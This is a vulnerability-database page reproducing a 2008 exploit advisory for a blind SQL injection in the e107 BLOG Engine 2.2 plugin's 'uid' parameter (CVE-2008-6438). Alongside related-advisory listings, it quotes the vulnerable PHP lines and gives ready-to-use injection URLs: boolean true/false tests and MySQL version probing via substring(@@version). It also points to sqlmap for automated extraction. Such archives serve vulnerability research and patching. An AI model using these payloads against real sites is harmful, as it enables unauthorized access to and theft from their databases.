Lucene search
+L

e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection

🗓️ 22 May 2008 00:00:00Reported by Virangar SecurityType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 23 Views

e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-6438
22 May 200800:00
circl
checkpoint_advisories
Check Point Advisories
E107 BLOG Engine Plugin Remote SQL Injection (CVE-2008-6438)
10 Nov 201400:00
checkpoint_advisories
cve
CVE
CVE-2008-6438
6 Mar 200918:00
cve
cvelist
Cvelist
CVE-2008-6438
6 Mar 200918:00
cvelist
exploitdb
Exploit DB
e107 Plugin BLOG Engine 2.2 - Blind SQL Injection
29 Jul 200800:00
exploitdb
exploitdb
Exploit DB
e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection
1 Sep 200800:00
exploitdb
exploitdb
Exploit DB
e107 Plugin BLOG Engine 2.1.4 - SQL Injection
28 Oct 200800:00
exploitdb
euvd
EUVD
EUVD-2008-6408
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-6438
6 Mar 200918:30
nvd
prion
Prion
Sql injection
6 Mar 200918:30
prion
##################################################################################################
  #                                                                                                #
  # ::e107 Plugin BLOG Engine v2.2 (macgurublog.php/uid) Blind SQL Injection Vulnerability::       #
  #                                                                                                #
  ##################################################################################################

Virangar Security Team

www.virangar.net

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)

-------vuln codes in:-----------
macgurublog.php:
line 18:$buid = $_GET['uid'];
..
..
line 31:$sql -> db_Select("user", "user_name", "user_id=".$buid);
---
exploit:
[-]note=becuse e107 using diffrent prefix/table names it's impossible to writting exploit for it :(

http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and 2>1/*   #the page fully loaded

http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and 1>3/*   #page loaded whit any data and some error that say "The user has hidden their blog."

cheking the mysql version:
http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and substring(@@version,1,1)=5
or
http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and substring(@@version,1,1)=4

# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...
---
young iranian h4ck3rz

# milw0rm.com [2008-05-22]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.03396
23